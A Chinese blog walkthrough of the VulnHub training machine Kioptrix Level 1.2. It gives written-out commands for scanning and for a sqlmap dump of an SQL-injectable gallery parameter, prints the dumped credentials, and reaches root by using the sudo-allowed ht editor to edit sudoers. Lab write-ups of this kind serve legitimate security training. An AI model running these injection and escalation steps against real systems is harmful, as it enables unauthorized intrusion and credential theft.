vulnhub靶机：Kioptrix : Level 1.2

燕雀安知鸿鹄之志哉.

于 2024-09-16 14:16:18 发布

阅读量210

点赞数 3

分类专栏： Vulnhub靶机文章标签：安全网络 web安全网络安全经验分享

本文链接：https://blog.csdn.net/weixin_68416970/article/details/142302235

版权

Vulnhub靶机专栏收录该内容

14 篇文章 0 订阅

订阅专栏

下载

下载地址：https://www.vulnhub.com/entry/kioptrix-level-12-3,24/

配置网卡

信息收集

主机发现

arp-scan -l

端口扫描

nmap -p- 192.168.109.176

目录扫描

python3 dirsearch.py -u "192.168.109.176"

访问 web

将域名与ip做绑定

如图所示

回到 Home

发现 id=1 ，可能存在 SQL注入

漏洞利用

SQL注入

python3 sqlmap.py -u "http://kioptrix3.com/gallery/gallery.php?id=1&sort=photoid#photos" --batch --dump

发现了下面几组账号和密码

dreg
0d3eccfb887aabd50f243b3f155c0f85 (Mast3r)

loneferret
5badcaf789d3d1d09794d8f021f40f0e (starwars)

admin
n0t7t1k4

尝试用 admin / n0t7t1k4 登录

登录之后，发现登录失败

尝试 ssh 连接

ssh dreg@192.168.109.176
Mast3r

sudo -l 后发现没有权限

切换loneferret用户

su loneferret
starwars

查看权限

sudo -l

权限提升

查看loneferret家目录的信息

ls -al

查找SUID可执行文件

find / -perm -u=s -type f 2>/dev/null

发现可以使用ht软件命令来编辑、创建和查看文件

用 ht 编辑器提权

sudo /usr/local/bin/ht
# 若报错Error opening terminal: xterm-256color，则执行下面这条命令
export TERM=xterm

F3		# 打开

手动添加 /bin/bash

F2		# 保存
F10		# 退出

提权成功

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

燕雀安知鸿鹄之志哉.

关注关注

3
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
复制链接

分享到 QQ

分享到新浪微博

扫一扫

专栏目录

KIOPTRIX: LEVEL 1.2-VulnHub靶机学习第四篇

qq_27466929的博客

09-04

1081

VulnHub靶机学习第二篇：KIOPTRIX: LEVEL 1.2

Vulnhub靶机系列：Kioptrix: Level 1.2 (#3)

汗的博客

04-01

872

这次的靶机是Vulnhub靶机：文章目录靶机地址及相关描述靶机设置利用知识及工具信息收集并getshell提权总结靶机地址及相关描述靶机设置老规矩，开启虚拟机前分配一个和攻击机一样的网卡，选择我已移动该虚拟机；开启虚拟机后，netdiscover确认一下目标，我的靶机ip为利用知识及工具信息收集并getshell 提权总结 ...

参与评论您还未登录，请先登录后发表或查看评论

Vulnhub靶机：Kioptrix_Level1.2

qq_48904485的博客

03-14

456

运行环境：Virtualbox攻击机：kali（192.168.56.101）靶机：Kioptrix_Level1.2（192.168.56.106）目标：获取靶机root权限和flag靶机下载地址：https://www.vulnhub.com/entry/kioptrix-level-12-3,24/

Vulnhub靶机：Kioptrix : Level 1.2

whoami

09-14

601

Vulnhub靶机：Kioptrix : Level 1.2实战

【vulnhub靶场】Kioptrix : Level 1.2靶机提权

qq_46421742的博客

07-26

306

免责声明：本文属于个人笔记，仅用于学习，禁止使用于任何违法行为，任何违法行为与本人无关。

Vulnhub-靶机-Kioptrix: Level 1.2 (#3)

qq_43264813的博客

01-28

818

Vulnhub—靶机—Kioptrix: Level 1.2 (#3) 本篇文章仅用于技术交流学习和研究的目的，严禁使用文章中的技术用于非法目的和破坏，否则造成一切后果与发表本文章的作者无关地址:https://www.vulnhub.com/entry/kioptrix-level-1-1,22/ 文章目录Vulnhub—靶机—Kioptrix: Level 1.2 (#3)一、信息收集二、漏洞利用三、Flag 一、信息收集【步骤一】使用nmap确定目标靶机地址：【命令】nmap -n -sC -s

vulnhub-KIOPTRIX: LEVEL 1.2 (#3)-KioptrixVM3靶场

shulao2010的博客

05-23

385

一个单机靶场，讲解了如何通过简单web漏洞获得主机root权限

vulnhub靶场/Kioptrix Level-1.2

qq_45230030的博客

04-18

441

基本是按下载地址中的顺序打的，第二个下载地址：GitHub - rishabhkant07/Privilege-Escalation-Cheatsheet-Vulnhub-: This is a Cheatsheet for CTF Challenges categorized by different Privilege Escalation Methods其中也附有相应的WP，也是有很多种方法，怎么方便怎么来吧。下载完靶机，更改网络为NAT模式，与攻击机设置为同一网卡模式。

Vulnhub靶机系列：Kioptrix: Level 1.3 (#4)

汗的博客

04-02

830

这次的是Vulnhub靶机：这次的靶机是Vulnhub靶机：Kioptrix: Level 1.2 (#3) 靶机地址及相关描述靶机地址：https://www.vulnhub.com/entry/kioptrix-level-13-4,25/ 靶机设置这个靶机需要自己新建一个空的虚拟机移除现在的硬盘，用靶机替换，开机。老规矩，用netdiscover和curl确定一下目标已经OK。 ...

KIOPTRIX: LEVEL 1.3-VulnHub靶机学习第五篇

qq_27466929的博客

09-11

1255

VulnHub靶机学习第二篇：KIOPTRIX: LEVEL 1.3

AI在医学领域：医学AI的安全与隐私全面概述

声纹感知洞察芯声

09-12

1389

本文通过系统化地检查医疗应用领域并为未来的攻击研究奠定基础，提供一个医疗领域AI攻击研究的全面视角。

SSHamble：一款针对SSH技术安全的研究与分析工具

FreeBuf_的博客

09-11

1146

SSHamble是一款功能强大的SSH技术安全分析与研究工具，该工具基于Go语言开发，可以帮助广大研究人员更好地分析SSH相关的安全技术与缺陷问题。

无限边界：现代整合安全如何保护云

最新发布

网络研究观

09-15

773

通过工具之间更有效的数据共享，整合的安全平台还应提供更紧密的安全集成以及更强的系统可视性（无论是在云端还是在本地），让您能够看到无限周界的边缘。

伙房食堂电气安全新挑战：油烟潮湿环境下，如何筑起电气火灾“防火墙”？

acrel002的博客

09-12

522

安科瑞的智能安全配电装置打破了传统用电防护领域中仅仅只能做到“事后处理”的技术瓶颈，提前将配电转换安全电，从源头抑制电弧火花的产生，大大降低火灾风险，同时系统实时监测电气线路中电压、电流、功率、温度、剩余（漏）电流、对地绝缘阻值等关键数据，智能识别电路异常风险，及时将报警信息传送至云管理系统，提醒用户单位及时进行故障排查。近几年，随着我国经济的飞速发展，食堂餐饮也经历了一场变革，越来越多的电器走进了伙房食堂中，实现了电气化，为人们提供了高效便利的饮食服务，但同时也增加了火灾负荷。

【免费刷题】实验室安全第一知识题库分享

nulixueBe的博客

09-13

432

人工智能识别上海985大学的实验室安全知识手册，生成题库，直接刷题

3.比 HTTP 更安全的 HTTPS（工作原理理解、非对称加密理解、证书理解）

weixin_52173250的博客

09-07

1762

HTTPS（Hypertext Transfer Protocol Secure）是一种安全的超文本传输协议，主要用于在客户端和服务器之间安全地传输数据

消防指挥中心控制台：守护安全的关键枢纽

JiaDeLi_console的博客

09-11

479

它不仅是信息的接收者，更是行动的发起者，协调各方资源，确保消防救援工作高效、有序地进行。消防指挥中心控制台是消防救援工作的关键环节，它以先进的设计、强大的功能和不断升级的科技，为守护人民生命财产安全发挥着不可替代的作用。在未来，随着科技的进一步发展，相信消防指挥中心控制台将变得更加智能、高效，为构建更加安全的社会环境贡献更大的力量。同时，控制台还配备了舒适的座椅，为指挥人员提供良好的工作条件。在消防应急救援的战场上，嘉德立消防指挥中心控制台犹如一座坚实的堡垒，发挥着至关重要的作用。二、先进的设计与功能。

vulnhub靶机系列：

09-09

你好！关于Vulnhub靶机系列，我可以提供一些信息。Vulnhub是一个开放的漏洞测试平台，提供了一系列用于学习和实践渗透测试的虚拟机。这些虚拟机包含了各种不同的漏洞，供安全爱好者和专业人员练习渗透测试技巧。 Vulnhub上有许多靶机系列，每个系列都包含了多个不同难度级别的虚拟机。通过解决这些靶机，你可以学习到渗透测试中常见的攻击技术和漏洞利用方法。一些著名的Vulnhub靶机系列包括： 1. Kioptrix：这是一个非常受欢迎的系列，包含了多个不同难度级别的靶机。从初级到高级的挑战，覆盖了各种网络安全知识。 2. Metasploitable：这个系列模拟了一个容易受到攻击的系统，用于学习Metasploit框架和漏洞利用。 3. SickOS：这个系列提供了一些有趣的靶机，涵盖了各种不同类型的漏洞。 4. HackTheBox：虽然HackTheBox不是Vulnhub上的系列，但它也是一个非常受欢迎的漏洞测试平台，提供了一系列具有挑战性的靶机。这些靶机系列都可以帮助你锻炼渗透测试技能，并提供了一个实践环境来深入了解网络安全和漏洞利用的原理。希望这些信息能帮到你！如果你还有其他问题，请随时提问。